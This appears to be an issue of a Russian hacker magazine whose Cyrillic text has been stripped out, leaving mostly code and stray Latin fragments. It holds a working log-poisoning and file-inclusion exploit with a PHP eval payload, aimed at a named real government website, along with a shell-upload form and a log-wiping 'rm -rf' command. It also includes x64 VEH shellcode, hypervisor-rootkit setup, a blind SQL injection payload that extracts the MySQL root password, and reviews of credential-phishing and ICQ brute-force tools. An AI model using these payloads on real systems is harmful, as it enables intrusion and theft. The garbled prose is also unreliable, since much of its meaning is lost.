[Xxx Xxx xx xx:xx:xx 2009] [error]
[client xx.xx.xx.xx] client denied
by server configuration: /usr/
share/phpMyAdmin/ , referer: <?php
eval($_REQUEST[ev]); ?>
,
.
: http://www.mon.
gov.ua/main.php?query=../../../proc/self/
fd/2%00&ev=ls+la. ,
.
wget, get, links,
lynx, . html- :
<form action="http://www.mon.gov.
ua/main.php?query=../../../proc/
self/fd/2%00&ev=copy($_FILES[file]
[tmp_name], $_GET[aa]);&aa=./
mon.php" method="post"
enctype="multipart/form-data">
<input type="file"
name="file"><br>
<input type="submit"
value=""><br>
</form>
, (

). ,
2 error.php error.
.
,
. :
<?php/*
[Mon Nov 16 11:14:07 2009]
[error] [client ::1] client denied
share/phpMyAdmin/
[Mon Nov 16 11:14:08 2009]
share/phpMyAdmin/
[Mon Nov 16 11:14:14 2009]
share/phpMyAdmin/
[Mon Nov 16 11:14:15 2009]
share/phpMyAdmin/
[Mon Nov 16 11:14:18 2009]
share/phpMyAdmin/
...
*/ ?>
<?PHP
//Authentication
$login = ""; //Login
$pass = ""; //Pass
... ?>
, -
. ,
.
, . ,

GNU, , ,
. . , ,
rm rf /var/log/httpd/. :
, .
,
( ).

,
. z
059
VEH
R0064 R0064@MAIL.RU
WINDOWS
X64

,
X64. , ,
. ,
.
FS . .
, .
.
SEH
32- [fs]
: gs (, TEB ring-3
gs:30h, peb gs:60h). , EXCEPTION_DIRECTORY
PE-. , , fs
, SEH
. SEH
, ...
SEH , . -
64- Windows.
( VEH). 32- Windows (
). , ,
, 32- VEH
wasm.ru/article.php?article=veh.
SEH, VEH :
060
( ) ntdll RtlAddVectoredExceptio
nHandler.
RtlAddVectoredExceptionHandler(
ULONG FirstHandler,
PVECTORED_EXCEPTION_HANDLER
VectoredHandler )
,
SEH. ,
RtlDispatchException ntdll ?
RtlpCallVectoredHandlers, .
! , , ? , , - RtlAddVectoredExceptionHandler.
,
. ntdll RtlpCalloutEntryList ( Win Xp, Vista -
). .
X 03 /134/ 10

( )
VECTORED_EXCEPTION_NODE64.
RtlAddVectoredExceptionHandler windows XP x64:
public RtlAddVectoredExceptionHandler
RtlAddVectoredExceptionHandler proc near
lea r8, RtlpCalloutEntryList
jmp
short RtlpAddVectoredHandler
RtlAddVectoredExceptionHandler endp
PEB LIVEKD
,

CODING
VEH .
shellcode-, . , .
:
1. NTDLL.DLL.
2. RtlAddVectoredExceptionHandler, RtlEncodePointer.
3. , , .
4. .
ntdll PEB:
...
lea r8d, [rdx+20h]
mov rcx, [rcx+30h]
call RtlAllocateHeap
;
test rax, rax
mov rdi, rax ;
rdi
, 18h ( !) , ,
.
VECTORED_EXCEPTION_NODE64,
:
struct _VECTORED_EXCEPTION_NODE64
{
ULONG64
m_pNextNode;
ULONG64
m_pPreviousNode;
ULONG64
unknwn;
PVOID64
m_pfnVectoredHandler;
}
, , , ( 32- VEH).
RtlpAddVectoredHandler.
NtQueryInformationProcess , RtlEncodePointer,
.
. , RtlAddVectoredExceptionHandler VECTORED_EXCEPTION_NODE64.
, , :
1.
RtlEncodePointer ( );
2. RtlEncodePointer-
18h VECTORED_EXCEPTION_NODE64. , ,
, .
X 03 /134/ 10
....
mov rcx,gs:[60h] ; Peb x64
mov rcx,[rcx+18h] ; PEB_LDR_DATA
mov rcx,[rcx+10h]
; PEB_LDR_DATA.InLoadOrderModuleList
mov rcx,[rcx]
mov rbx,[rcx+30h] ; ntdll.dll base
....
ntdll. , . , ,
:
....
hash_str:
push rdx
push rsi
sub rax,rax
mov rsi,rdx
sub rdx,rdx
nxt:
cld
lodsb
cmp al,ah
je dn
add dx, ax
rol rdx,14
jmp nxt
dn:
mov rax,rdx
pop rsi
pop rdx
ret
....
rdx
, , -
061
UNINFORMED
WINDOWS
X64
(hndlr01).
(hndlr02).
rdmsr ( - ),
hndlr01 ( ),
hndlr02. , :
...
mov rbx,rsp
sub rsp,4*8
mov rdx, offset hndlr01
mov rcx, 1 ; first_handler
call qword ptr [rbx]
; RtlAddVectoredExceptionHandler
add rsp,4*8 ;
push rax ; VECTORED_
EXCEPTION_NODE64
sub rsp,4*8
mov rcx,offset hndlr02
call qword ptr [rbx+8] ; RtlEncodePointer
add rsp,4*8
pop rdi ; rdi -> PVECTORED_EXCEPTION_NODE64
; hndlr02
mov [rdi+18h],rax
;
; cpl = 3 => exception
rdmsr
...
, ?
RtlAddVectoredExceptionHandler ,
!
VECTORED_EXCEPTION_NODE64.
, fs (, ).
, RtlAddVectoredExceptionHandler.

VEH-
, ,
VEH, . , ( !),
RtlDispatchException. , , RtlRaiseException,
RtlDispatchException.
int __fastcall RtlRaiseException(struct _EXCEPTION_RECORD
*ExceptionRecord, int, int, __int64, __int64, __int64)
062
FDBG
....
call RtlVirtualUnwind
mov r11, [rsp+538h+ContextRecord._Rip]
mov [rbx+10h], r11
mov rax, gs:30h
mov rcx, [rax+60h]
cmp byte ptr [rcx+2], 0
jnz loc_77F528CB
lea rdx, [rsp+538h+ContextRecord]
mov rcx, rbx
call RtlDispatchException
....
, RtlDispatchException
call RtlpCallVectoredHandlers:
...
RtlDispatchException proc near
mov
[rsp+arg_8], rdx
mov
rax, rsp
sub
rsp, 6A8h
mov
[rax+18h], rbx
mov
[rax+20h], rbp
mov
[rax-8], rsi
mov
[rax-10h], rdi
mov
[rax-18h], r12
mov
[rax-20h], r13
mov
[rax-28h], r14
lea
r8, RtlpCalloutEntryList
mov
rbx, rdx
mov
[rax-30h], r15
mov
rsi, rcx
mov
[rsp+6A8h+var_668], 0
call
RtlpCallVectoredHandlers
...

RtlpCallVectoredHandlers.
WinXP:
...
loc_77F251F5:
; CODE XREF:
RtlpCallVectoredHandlers+3F2BE
mov
rbx, [rsi+18h]
mov
r9d, 4
lea
r8, [rsp+88h+var_58]
lea
edx, [r9+20h]
X 03 /134/ 10
WASM.RU VEH
mov
rcx, 0FFFFFFFFFFFFFFFFh
mov
[rsp+88h+var_68], r12
call
NtQueryInformationProcess
mov
r11d, [rsp+88h+var_58]
lea
rcx, [rsp+88h+var_48]
xor
r11, rbx ; <-
call
r11 ; <-
lock btr cs:dword_77FA58C8, 0
...
Vista:
...
loc_78E9393F: ; CODE XREF: RtlpCallVectoredHandlers-16030
add
dword ptr [r12+10h], 1
lea
rbx, [r12+10h]
mov
rcx, rdi
mov
[rsp+68h+arg_18], r12
call
RtlReleaseSRWLockExclusive
mov
rcx, [r12+18h]
call
RtlDecodePointer
; <-
lea
rcx, [rsp+68h+var_48]
call
rax ; <-
...
, , , , .

X 03 /134/ 10
NtQueryInformationProcess/RtlDecodePointer. ,
call-. ,
. , ,
.
, Vista
VEH- PEB. ?
RtlpCallVectoredHandlers :
...
mov
mov
mov
bt
jb
...
rax, gs:30h
; TEB
r15, [rax+60h]
; PEB
eax, [r15+50h] ; ProcessUsingVEH
eax, r8d ;
call_vectored_handlers
,
PEB !
64- Windows, SEH, VEH.

. , , ,
.
( )
. ,
. z
063

r0064 r0064@mail.ru
2.
AMD-V.
.

,
. .

Long Mode ,
( ),
Long Mode , 64-
-.
VMRUN

( ? :))
VMRUN .
,
VM_HSAVE_PA.
VMCB (
rax).
,

...
VMCB?
VMRUN
(
). - -
064
,
VMEXIT_INVALID (,
VMEXIT
).
, VMRUN ?
,

VMCB.
, VMCB:
http://opensolaris.org/sc/src/xengate/xvm-3.4+xen.hg/xen/include/
asm-x86/hvm/svm/vmcb.h
1. SVME EFER 0.

.
2. CR0.CD CR0.NW. Cache Disable ,
. ( , AMD)
. , VMRUN
CD.
3. 32 CR0 0.
CR0 ( long
mode), ,
0 ( ).
4. CR3, CR4, DR6, DR7, EFER
, MBZ (Must
Be Zero).
5. ASID 0. ASID
,

(TLB).
ASID
.
, TLB
. ASID-
TLB
. , , .
6. .
,
.
// eventinj_t VMCB

X 03 /134/ 10
VMCB VMRUN 10h

VMRUN :
...
// VMRUN_INTERCEPT
0
pVmcb->general2_intercepts|=1;
...
typedef union
{
u64 bytes;
struct
{
u64 vector: 8; //

u64 type: 3; //
u64 ev: 1; // ,
( errorcode).
u64 resvd1: 19; //
u64 v: 1; // Valid.
,
,
u64 errorcode:32; //
} fields;
} __attribute__ ((packed))
eventinj_t;
, ( type) 4:
0 INTR ( );
2 NMI ( ).
NMI, (vector) ;
3 ;
4 .
ev (Error code valid) ,
errorcode
.
? , 64- ,
#BR (
bound), .
VMEXIT_INVALID,

X 03 /134/ 10
type (1,5,6 7).

, 2,
NMI ( , !).
7. EFER.LMA (Long Mode Active)
LME (Long Mode Enable),
Long Mode, ,
Long Mode.
,
.
8. EFER.
LME CR0.PG ( ) CR4.PAE ( CR0.PE) .
9. EFER.LME, CR0.PG, CR4.PAE (
), CS.L
CS.D . CS
. L D
. 32- D
(32
16 ), L , ,
64 . , , ,

(
,
64
32 ).
10. VMRUN (
VMCB)

. ,
. ,
VMRUN, .
, .

20 (!) .
.
, general2_intercepts
VMRUN
svm-:
VMMCALL,VMLOAD,VMSAVE,STGI,CLGI
SKINIT,
.
11.
MSR (MSRPM) - (IOPM)
.
() ! MSR ( -)
4 .
VMRUN 12
MSRPM IOPM. , ,
.
VMCB , .
, .
,
:).
VMRUN

.
, VMRUN
( State Save
Area):
1. CS rip ,
. CS , rip
long mode (
32-,
eip).
2. rflags,rax...
3. SS ( ) rsp .
32- rsp, a esp :).
4. CR0, CR2 (

page fault), CR3, CR4 EFER .
5. IDTR, GDTR( GDT IDT),ES DS, DR7 DR6.
6. V_TPR (TPR). v_tpr
CR8 .
,
, , , -
,
- ,
.
(, 7) CR8

7() .
065
CR0
HTTP://WWW
links

Broken Sword
wasm.ru, : http://
wasm.ru/publist.
php?list=24.
( )
Long Mode

.

AMD64 (EM64T)
viva64.com/content/
articles/64bit-development/
?f=amd64_em64t_rus.
html&lang=ru&
content=64-bitdevelopment.
x8664

insidepro.com/kk/
072/072r.shtml.
An
Introduction
to HardwareAssisted Virtual
Machine (HVM)
Rootkits (
,
TSC_OFFSET)
megasecurity.org/
papers/hvmrootkits.pdf.
Revision Guide
for AMD NPT Family
0Fh Processors
( erratum-)
support.amd.
com/us/Processor_
TechDocs/33610.pdf.
066
CR3 LONG MODE ( 64 !)

7. V_IRQ. ,
.
8. CPL .
CPL = 0,
8086, 3.
CPL : 0 , 3, , .
VMRUN (Control Area).
TSC_OFFSET.
TSC_OFFSET
( TSC) ,
.
, rdtsc,

TSC_OFFSET.
(Erratum 140), TSC MSR
rdmsr, rdtsc TSC_OFFSET .
, Control Area
,
.
ASID ..
VMCB
segment_register ( Xen),
:
// ,
typedef union segment_attributes
{
uint16_t bytes;
struct
{
uint16_t
uint16_t
uint16_t
uint16_t
uint16_t
type:4;
s:
1;
dpl: 2;
p:
1;
avl: 1;
/*
/*
/*
/*
/*
0;
4;
5;
7;
8;
Bit
Bit
Bit
Bit
Bit
40-43 */
44 */
45-46 */
47 */
52 */
uint16_t
uint16_t
uint16_t
uint16_t
} fields;
l:
db:
g:
pad:
1;
1;
1;
4;
/* 9; Bit 53 */
/* 10; Bit 54 */
/* 11; Bit 55 */
}
__attribute__ ((packed)) segment_
attributes_t;
// , VMCB
struct segment_register
{
//
uint16_t
sel;
//
segment_attributes_t attr;
//
uint32_t
limit;
//
uint64_t
base;
} __attribute__ ((packed));
VMCB . :
1. , (D, L, R).
2. TR TSS (,
).
3. LDTR (P).
- ,
VMRUN (,
). VMRUN
#VMEXIT.
VMRUN VMEXIT:
X 03 /134/ 10
CR4
LONG MODE
//
( )
// paVmcb physical address vmcb
// vaVmcb virtual address vmcb
do
{
// VMEXIT
, ..
InstallIntercepts(vaVmcb);
// VMRUN
VMCB
_VMRUN(paVmcb);
//
switch(vaVmcb->exitcode)
{
case VMEXIT_RDTSC:
...
break;
case VMEXIT_VMRUN:
...
break;
...
//
}
}while(1);

( X 03 /134/ 10
). .
VMCB
,
?

:).

VMCB Host Save Area
MmAllocateContiguousMe
morySpecifyCache. :
NTKERNELAPI
PVOID
MmAllocateContiguousMemorySpeci
fyCache(
IN SIZE_T NumberOfBytes, //

IN PHYSICAL_ADDRESS
LowestAcceptableAddress, //
IN PHYSICAL_ADDRESS
HighestAcceptableAddress, //
IN PHYSICAL_ADDRESS
BoundaryAddressMultiple OPTIONAL,
//
IN MEMORY_CACHING_TYPE
CacheType
);
,
( , ).

VMCB:
..
l1.QuadPart = 0; //

l2.QuadPart = -1;
//
l3.QuadPart = 0x10000;
//
// VMCB 1 , =>
uNumberOfPages = 1
// CacheType = MmCached
PageVA = MmAllocateContiguousMe
morySpecifyCache (uNumberOfPages *
PAGE_SIZE,l1, l2, l3, CacheType);
if (!PageVA)
return NULL;
//
RtlZeroMemory (PageVA,
uNumberOfPages * PAGE_SIZE);
//

PagePA = MmGetPhysicalAddress
(PageVA);
...

HSA, MSR IOIO.
. , ,
(
), . ,
.
-
e-mail
(
). z
067

Ams ax330d@gmail.com

SQL
SQL
.
, ,
SQL- ,
-
,
.
SQL, .

? ,
, . ,
. , ,

/. , ,
SQL-. -,
.
.

, - , ?
,
,
, true/false. , . .
, : , time-based SQL . !
068
, advanced timebased SQL-.

, ,

.
,
- .
, .
.
MySQL 5. ,
5.0.12 , ( ) SLEEP().
mysql> SELECT SLEEP(2);
+----------+
| SLEEP(2) |
+----------+
|
0 |
+----------+
1 row in set (2.00 sec)
-
.

BENCHMARK() :
1. BENCHMARK() ,
;
2. BENCHMARK() ,
;
3. SLEEP() ;
4. BENCHMARK() WAF.

SQL- ?
, ,
/, .
. ,

X 03 /134/ 10
2
SUBSTR()
MID(),
ASCII-. ,
, SLEEP().
mysql> SELECT ORD('*');
+----------+
| ORD('*') |
+----------+
|
42 |
+----------+
1 row in set (0.00 sec)
,
. *
42 , f?

40. 42 ,
, -
0.
.
:
http://victim.com/index.php?id=1
AND 1=(SELECT SLEEP((ORD(MID(passw
ord,N,1))-40)) FROM 'mysql'.'user'
WHERE ùser`='root' LIMIT 1) --
?
:
1. N- ;
2. ORD() ASCII-;
3.
SLEEP().
, , . , , ,

. ,
-.
Perl-, X 03 /134/ 10
POC-
.
- , (
). : , ,
, , ,
Proof Of Concept.

-p (
precision, -, ).
, .

, ,

root ( ),
. ( , ), ,
.

,
:
,
, .
,
2, -

5 ( ).
ASCII-
50, 2.
, ,
, .
6.5 ,
ASCII- 52, 4.
, - ,

.
,
, ,
, precision. , -p.

,
.
, ,
.
, , .
, .
6.5 ,

069
APACHE
. ,
precision, ,
2 11-13
(). ,
11 ,
13,5 ,
.
,
. , 0,
41 (
) 400
,

318 .
, ,
? , ,
. ,

.

( SQL-) , , .
,
.
, ,

. , ,
,
, ,
0-9, A-Z. *.
-
BENCHMARK() GREENSQL'
070
. , , ,
MySQL, .
. , ,
,
.
, ,
, .
,
?. ,
, 40
40- MySQL
-
SQL-.
,
,
.

MySQL
. , PostreSQL
SLEEP()
pg_sleep(), .
, , .
, ,
,
-
. ,

SQL-.
,
.
? z
X 03 /134/ 10

icq 884888, http://wap-chat.ru
X-TOOLS

: QIP Fake
: WINDWS 2000/2003/XP/VISTA/7
: JIYKA
QIP,

-
: QIP 2005 :).
: ArxScanSite
: WINDOWS 2000/2003/XP/VISTA/7
: ARXWOLF

X-Tools
(jiykasoft.3dn.ru)
ICQ- QIP.

QIP 2005 Build 8092.
:
, ( ,
, ),

.

:
: JIyka
: JIykaSoft.3dn.Ru
Email : JIyk@bk.ru
: uin;pass

.

: *.htm ,

:).
QIP\
Skins\skins.cfg:
e-mail,
;
;

.
QIP\
Skins\ICQ5\start.jpg .

, :
QIP 2005 (http://qip.ru/ru/pages/download_qip_ru)

072

ArxWolf webxakep.net
.
?
, ,

, ,
,

,

AntiDDoS-.
:
( 1 50
)
http https
(HTTP
200, 301, 404, 403, 401, 302)
(
)
Proxy/
Socks

( )

(
)
(
)
HTTP--
(UserAgent, Referer ..)

,

:
.htaccess
.htconfig
.htpasswd
_adm/
_install/
_mysql/
_notes/
_private/
_update.php
_voip/
_vti_bin/
~install.php
~update.php
1.php
1/
2003/
2006/
2007/
2008/
666/
about.php
about/
access
access_log
account.asp
account.html
account.php
acct_login/
add/
addnews/
adm/
adm2/
admin.asp
admin.cfg
admin.dat
admin.html
admin.inc
admin.php
: Storm 2008 Brutal

Edition
: Q1P
Storm 2008 Brutal Edition icq-,
, ICQ- .

. -
X 03 /134/ 10
syntax: /autosave value

/show show .Brutal and bot windows
/hide hide .Brutal and bot windows
/runbrt run and start .Brutal
/killbrt hard terminate brute
process
/good show good list
Storm 2008 Brutal Edition

.Brutal 0.3-0.8+ (
IPD-, ,
).
:
.Brutal (,
, cleanup,
, );
windows
;
good' icq-()
;
;

(
,
,
);
;
;

;
:
, icq gate (
), , ..
:
1. Brutal control.
/stats (or 1) show .Brutal
statistics
/start press 'start' button in
.Brutal
/stop press 'stop' button in
.Brutal
/pause press 'pause' button in
.Brutal
/continue press 'continue' button
in .Brutal
/cleanup clean proxies in .Brutal
syntax: /cleanup [proxy_type]
proxy types: https (h), socks4 (s4),
socks5 (s5)
note: without parameter = cleanup
all proxies
/brtopt display .Brutal options
/threads set threads count
syntax: /threads value
/timeout set timeout option
syntax: /timeout value1 value2
note: value2 used only with .Brutal
0.5
/clntime set cleanup time
syntax: /clntime value
/autosave set autosave time
X 03 /134/ 10
2. Bot administration.
/adminlist show admin list with
permissions
/add add UIN to admin list
syntax: /add UIN[:permissions]
ex.: '/add 123123', '/add 321321:++--'
permissions: 1 send new good's, 2
allow to use commands, 3 allow to
use /stats, 4 allow to administrate
bot, 5 notify terminating
default permissions is -+++/delete delete UIN from admin list
syntax: /delete UIN
/pchange change permissions
syntax: /pchange UIN:perm_
index:permission , /pchange
UIN:permissions
ex.: '/pchange 123123:1:+', '/
pchange 321321:+-+-+'
/settings display bot settings
/set set bot settings
syntax: /set -option value
note: for information send '/set ?'
/botlog show bot log
syntax: /botlog [count] default
count is 10
note: large messages will not be
delivered
/messlog show messages log
syntax: /messlog [count] default
count is 10
note: large messages will not be
delivered
/pluglist show list of plugins
/clrlog clean system and messages
logs
,

,
. ,

icq (
, ).
( )
,
.

.
,
: ,
, ,
(
, rar zip) ..

uin;pass ,
, , . ,

,
,
.

.
,
,
, .

, (
)
http://qip-blog.
eu.org/storm2008be.
: ORACLE SECURITY TOOLS

(GUI)
: CYBER$NAKE

MySQL MySQL?

. Oracle Security
Tools ,
Oracle 8i-9i, 10g, 11g. Oracle
Client
Oracle
.
:
Oracle;
Oracle
;
Oracle
=;
Windows 2000/
XP/2003 (
);

DOS ;

;
TNS listener.log;
;
.
securetools.ru. z
073

lozovsky@gameland.ru
X-

,
,
,
.

,
,
,
074
. ,

. ,

(, )
!
X 03 /134/ 10
AMATEUR PHOTO:
SINtez aka
SINTEZ
( )
(,

)
:
: , -
- .
,
,
, ,
.
? , ,
: ,
, .
,
, ,
,
. ! , ? , .
z
. ,
, , -,
, -
, , ,

Mens Health ( , z . SINtez
:
-? , ,
, , . ? ,
Dr.Cod aka
:
. ,
( 1998).
:
.
-, ,
.
- -
,
. Dr.Cod

,

, , .
X 03 /134/ 10
,
,
. ,
, .
? IRC ?
! ,
, - ,
.
?
, ? ,
:
! ,
, - .
.
2poisonS aka , ,
.
: -
. .
!

http://2funkey.ru, , :).
, FAQ ( Hack-FAQ,
!), ,

,
, . ,
,
.
(
), , .
,

,
,

:) ,
(, )
.

, 1959
. , .
:

. , ():
,
,
.
:

,
,
,
,
,

.
075
Holod aka
: 1999
: ? (-, , . ).
, , ,
.
, , ,
,
, . ,
.

( ),
,
, :
,

:), ,

z .
HorrifIc aka

: 1999
:
HOLOD

,
, , :
,

.
, , ,
:),
(2003-2004-) z
.
: -, -!
IT ,
HR (human resources).
.
: ,

, -,
, -, . .
,
.
,
z.
,
25.
x-crew.
HORRIFIC
,

, , ,
.
.

.
,
( 7
!)
Hack-FAQ, Horrific

z.
, , SINtez
,

, ,
076
,
:).
( 40000 ), z ,
,

.
, ,
,
, .
,
, z,
,
Horrific,
z 2001 :). -
, web-
,
www.cydsoft.com,
www.heapar.com www.flenov.info (
, ).

, ,

.
.
.
,
.
X 03 /134/ 10
aka
: 1999
: ,

( ,
. ).
-,
. . ,
,
,

.
, ,
.
,
, : SINtez,

, ,
z.
, ,
.

Mindw0rk aka
: 2003
:
2004 ( .
!
!).
,
,
.
z
, , ,
,
. , ,
, ,
, , ,
,
( ,

),
X 03 /134/ 10
, .
, ,
AI: SkyNet
.
, ,
,
,

, z
, ,
X-Crew, ,
,

SMS :
? ! ?
? ! !.
, Scut-, m00,
cDc
(!)
udaff.com.

,

( ),

,
.
.

,
,
, , XXI
,
. ,
mindw0rk.
,

( , ), MMORPG (
,
.
,
.
: . ,
. PR-
RuTube
Mediahunter.ru.
: .
, . ,
VIP-.
.
.
,
.
- *!,

.
MINDW0RK
FREEBSD. ,
!
),
,
. , , - .
: .
, ,
-.
. ,
.
, z: , , , .
,
- ,
. ,
- ,
:).
077
b00b1ik aka
: 2004
:
.
,
,
, ,

,
z? , ! -,

,
. -,

( , ,
, ),
(asechka.ru), ,
, (
), ,
. ,

aka CuTTer
,
( 2004 )
.
,
,
, ( 18 )
,
- 60% .
(,
, ,
, , ),
.
( , ,
CuTTer NSD),
,
, ,
PC-ZONE
, ,
(M.J.Ash)
, , ,
- . ,
DVD: Caution! Hot content! / , !

, , ,
:
z-.
. ,
z :).
,
078

,
2010- . ,
z- -
,
,
, ? ,
-
- .
.
,
,
, .
, ,
- .
,
: .

( ,

-). ,
- :). z
X 03 /134/ 10

MIFRILL MIFRILL@REAL.XAKEP.RU
BITTORRENT

.
,

.
,
,
,

,

,

BITTORRENT,

.
080
X 03 /134/ 10
?
, , , ,
. ,
, , ,

. ,

, .

, , ,
,

. 1975 , , , ,
,
, ,
. ,
,
. ,
,
, .
,
2 , .
,
-.
, - Stuyvesant High School.
, ,
. , ,
, ,

,
, . , ,
, , , ,
.
, , ,
,
, , ,
. ,

, , ,
.
-
,
.

,

( , ).
:

,
X 03 /134/ 10
BITTORRENT INC.

. ,
, ,
, ,
; -
,
.
, ,

,
.

( , Basic C),
6 .
80- Stuyvesant High School
,

, , , , 10 .
1993 , ,
, .
,
,
,
,
.
,
, .
,
.
, , , ,
, .
,
,
90-,
2000- . ,

- :).

, ,
,
081
BITTORRENT
, , !

Python Java.
,
Evil Geniuses
for a Better Tomorrow.
,
,

MojoNation.
1999-2001
, peer-to-peer

,
;
Napster, -
KaZaa,
, - , ,
MojoNation ,
.
,

KaZaa

,
upload. ,
, , ,
700 , , 1.5 \,
1\10
. ,

. , ,
, . , ,
,
, ,
,
, ,

.
,
,
,
,
, ,
.
, , ,

, ,
, .

2001 , ,
1 2001.
Gnutella eDonkey2000, .

,
,
-
.
MojoNation :

, ,
MojoNation

, ,

,
.
082
mp3 ,
, -
, ,

,

.
2001
Evil Geniuses for a Better
Tomorrow
,
.

, ,
BitTorrent
,
.

2001 ,
,
1 2001.
,
BitTorrent
,
- :).
, ,
, ,
:

;
;
; ,

;
, (Give
and ye shall receive
).
,
BitTorrent-, 2002 , CodeCon,
,
.
BitTorrent
OpenSource-, ,
, ,

. ... ,
, ,

,

C BitTorrent,
-
-
-. ,

, .
, ,
,

BitTorrent .
,

.
,
:
BitTorrent

, ,
X 03 /134/ 10
.

( , ,
),
BitTorrent . , , ,
vs. -

.
,
,
.
,
. 2003
,
Valve
(-, Half-Life),
. -
PayPal, ,
, ,
, ,
.
, , 2003
BitTorrent 20 .
. , .
,
,
.
Valve 2004-,
.

X 03 /134/ 10
.
-
BitTorrent Inc.,
.
, BitTorrent,

( - ) BitTorrent DNA (Delivery
Network Accelerator) BitTorrent Software Development Kit.
. , 2005
BitTorrent Inc. , MPAA (
) ,
BitTorrent
,
.
,
,
,
. , ,
, -
,
BitTorrent
, ,
.
, , , ,
,
.
, -,

, -,
MPAA, RIAA
,
.
, ,
, .
, , , ,
, ,

DVD,
,
, . ,
,
,
,
,
, , ,
. - ,

,
, , . ,
,

, -,
, . , ,
;
BitTorrent , ,
5
. z
083
UNIXOID
HATCHET MAKS.HATCHET@YANDEX.RU
Gujin, netboot.me
boot.kernel.org
, , ,
?
, , ? ? ,
Gujin,
netboot.me boot.kernel.org.
GUJIN.
LiLo Linux ,
Grub

, Gujin (http://gujin.
sourceforge.net) , .
Linux-,
(*.bdi) ISO-
.
Gujin . ,

/boot.

. ,
Linux
.
, Gujin ,
084
-, USB-, CD-ROM,
SD-. DOS. Gujin
ELF32
ELF64, gzip,
, FAT12, FAT16, FAT32, ext2, ext3,
ext4 ( inode) ISO 9660.

,
(,
USB- ).
,

. -, Gujin
,
,
,
CD/DVD-ROM
BIOS. -,
Gujin , : 64-
ELF- 32- 64 .
-,
Gujin :
- .
Gujin

Linux;
http://sourceforge.net/projects/gujin/
files.
tar.gz-,
:
$ tar -xzf debian32.tar.gz
$ sudo dpkg -i gujin_2.7_i386.deb
/sbin
gujin,

X 01 /133/ 10
3. gujin :
$ sudo gujin --remove /dev/sda
Gujin

. ,
,
:
$ sudo gujin //gujin.ebios

gujin :
$ sudo gujin --mbr-device=/dev/sda
/mnt/sdb/boot/gujin.ebios
boot.kernel.org
, /usr/share/doc/gujin/
, man-
/boot/gujin.ebios.
Gujin
, .
,
qemu :
$ sudo qemu /dev/sda

. <F1-F12>
, + - ,

, / *
,
.
, qemu -
.

. , -
,
(, VESA),
(, ISO-, CD-ROM, -,
), (!)
. ,
Gujin
. .
Gujin
:
1. :
$ sudo gujin --full /dev/fd0
-
/
initrd /boot. Gujin
, -t
.
Gujin USB-
:
$ sudo gujin /dev/sda

$ sudo gujin --mbr /dev/sdc
USB-, .
2. :
$ sudo gujin --report /dev/sda
,
.
GUJIN
--bootdir= .
--cmdline= Linux-.
-f, --full .
--mbr-device= MBR .
--quickboot= , (
, ).
--default_ide_password= IDE-.
--default_video_mode= VESA- (
, <Tab> ).
-d=, --disk=DOS|BCD|PIC|FLOPPY|IDE|BIOS|EBIOS ...
( BIOS).
-COM[1-4][,<9600>[,<n>[,<8>[,<1>]]]]], --serial=COM[1-4]... .
X 01 /133/ 10
.ebios
,
gujin .
: bios, ebios, idechs, idelba, and idel48.
Gujin -

:
FAT12/16/32
.
,
dd:
$ sudo dd bs=512 count=64 if=/dev/
zero of=/dev/sdc
BIOS USB
.
superfloppy,

( ):
$ sudo gujin --disk=BIOS:0x00,auto
/dev/sdc
Gujin CD ( El-Torito).
mkiso ISO- (, )
:
085
UNIXOID
FreeBSD

Gujin
GUJIN
* 15 ISO- .
* ISO 127 .
* ISO ext2/ext3.
* LiveCD - , / /boot.
* Gujin LiveCD,
, .
$ gujin image.iso
512
FAT-,
.
USB-.
-t .
Gujin DOS-,
Linux DOS:
$ gujin boot.exe
GUJIN.
Gujin .
,
. ,
. , Gujin ,
MBR-, ISO-,
, USB-, -,

, ,

.
,

-.

, Linux-
086
,

? , ?
, netboot.me

.
: ,
( )
,
. ,
-
, :
1.
(

).
2. ( memtest86).
,
.
3. .
(
).
4.
.
BIOS,
,
,
.
netboot.me gPXE
(http://etherboot.org/wiki),

, PXE.
PXE,
, gPXE
, -, USB-

, FTP, HTTP NFS.
gPXE netboot.me
.
, netboot.me . kernel
initrd .
,
.
netboot.me
gPXE-:
USB-, - CD. ,
:
1. gPXE-.
2. :
$ sudo
fd0 //
$ sudo
sdf //
dd if=netbootme.dsk of=/dev/
-
dd if=netbootme.usb of=/dev/
USB-
3. .

,
NETBOOT.ME BKO
netboot.me boot.kernel.org
, .
. ,
( <Ctrl+B>) .
X 01 /133/ 10
Gujin
netboot.me
Gujin
DHCP-,
.
4. /.
:
Debian Lenny (5.0).
Debian Testing.
Fedora 11.
OpenSUSE 11.1.
Ubuntu Jaunty (9.04).
Ubuntu Karmic (9.10).
FreeBSD 7.2.
MirOS bsd4me current ( Open NetBSD,
www.mirbsd.org).
LiveCD :
Tiny Core Linux 2.2.
Micro Core Linux 2.2.
MirOS bsd4me current.
:
Memtest 86 Memtest 86+.
HDT 0.3.4.
- GParted
Live 0.4.5-2 Parted Magic 4.5.
Ubuntu Jaunty (9.04) x86 rescue
Ubuntu Karmic (9.10) x86 rescue.
Smart Boot Manager.
,
nethack boot.kernel.org.
boot.kernel.org ( BKO)
netboot.me .
gPXE , :
Debian live.
Ubuntu 9.04.
Damn Small Linux.
Knoppix 5.0.1.
Fedora 11 Live CD.
: , LiveCD,
.

, netboot.me

. initrd
( ) -
, netboot.me
( ,
google ),
MY CONFIGS, new. , ,
X 01 /133/ 10
Kernel/Image, initrd Initrd

Args.
, ,
Chainload URL , ID ,
. netboot.
me
Press any key for options or wait n seconds.
Boot a configuration directly ID
.
netboot.me, boot.kernel.org ,
. ,
. .
, git nasm:
$ sudo apt-get install build-essential gitcore nasm
WARNING
warning
Gujin
,

(*.bdi) ISO- / /
boot.

,
--bootdir=/
//

.
BKO:
$ git clone git://git.etherboot.org/scm/
people/pravin/BKO.git
$ cd BKO
$ git submodule init
$ git submodule update
config ,
BASE_URL URL, BKO ( gpxe), ISO_LOCATION_
LOCAL URL ISO- (
BASE_URL/ISO).
gpxe
BKO:
$ make
$ cd install_help
$ ./configure_BKO.sh
initramfs ISO-:
$ ./download_initramfs_images_http.sh
$ ./download_ISO.sh
, BKO
- (, /var/www)
.z
087
UNIXOID
zobnin@gmail.com

, . -, , , -, , ,
, - . , ?
-
ANONYMOUSE.ORG

-,
IP-
IP- .
088
,
,
( , ,
,
).
IP- ,
-,
,
. ,
.
-,
, , . , , ,
X 01 /133/ 10
FREENET
-,
, ( , ).
e-mail
,
SMTP-,
, , .
(bouncer, bnc)
IP- IRC. ,
,
-:
.

,
.

Tor,

, ,
, X 01 /133/ 10

.
Tor (Onion
Routing),
90- . ,

, ,

()
.
: , ,
Tor-, Tor-.
(
),
.

Tor-,

, Tor-,
.
,
Tor-.
